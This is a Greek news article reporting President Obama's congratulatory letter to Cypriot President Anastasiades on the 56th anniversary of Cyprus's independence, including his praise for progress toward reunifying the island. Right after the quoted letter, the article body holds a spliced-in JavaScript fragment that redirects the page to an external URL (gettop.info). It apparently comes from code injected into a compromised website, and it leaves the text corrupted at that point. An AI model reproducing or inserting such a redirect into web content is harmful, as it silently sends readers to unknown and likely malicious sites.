Επιστολή Ομπάμα σε Αναστασιάδη: Συγχαρητήρια για την πρόοδο στο Κυπριακό

0
8

 

Επιστολή προς τον Κύπριο Πρόεδρο Αναστασιάδη απέστειλε ο Πρόεδρος των ΗΠΑ, Μπαράκ Ομπάμα, με αφορμή την 56η επέτειο της Ανεξαρτησίας της Κυπριακής Δημοκρατίας.

Στην επιστολή του ο Πρόεδρος των ΗΠΑ αναφέρει ότι «εκ μέρους του λαού των ΗΠΑ εκφράζω τα εγκάρδια συγχαρητήριά μου σε εσάς και στο λαό της Κυπριακής Δημοκρατίας για την 56η επέτειο της Ανεξαρτησίας της χώρας σας.

Εκτιμούμε την εταιρική μας σχέση με την Κυπριακή Δημοκρατία για την ενίσχυση της οποίας εργαστήκαμε τα τελευταία χρόνια. Μαζί έχουμε διευρύνει τις προσπάθειες μας για να προωθήσουμε τη σταθερότητα και να καταπολεμήσουμε την τρομοκρατία στην περιοχή.

Έχουμε δημιουργήσει μεγαλύτερες ευκαιρίες για την περιφερειακή οικονομική ολοκλήρωση και θα συνεχίσουμε να εργαζόμαστε μαζί σας για την περαιτέρω ενίσχυση των διμερών μας σχέσεων στους τομείς της ασφάλειας, του εμπορίου και των επενδύσεων.

Με την ευκαιρία αυτή θα ήθελα να επιδοκιμάσω τη σημαντική πρόοδο που γίνεται προς την επίτευξη μιας δίκαιης και διαρκούς λύσης για επανένωση της νήσου σε διζωνική δικοινοτική ομοσπονδία. Μια λύση που θα δημιουργήσει μεγάλες προοπτικές για περιφερειακή συνεργασία και θα προσφέρει σε όλους τους Κύπριους ένα λαμπρότερο μέλλον. Παραμένουμε βαθιά δεσμευμένοι για τη στήριξη των προσπαθειών σας και πιστεύουμε ότι μια λύση είναι εφικτή.

Παρακαλώ δεχθείτε τα πιο ειλικρινή συγχαρητήρια προς το λαό της Κύπρου». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here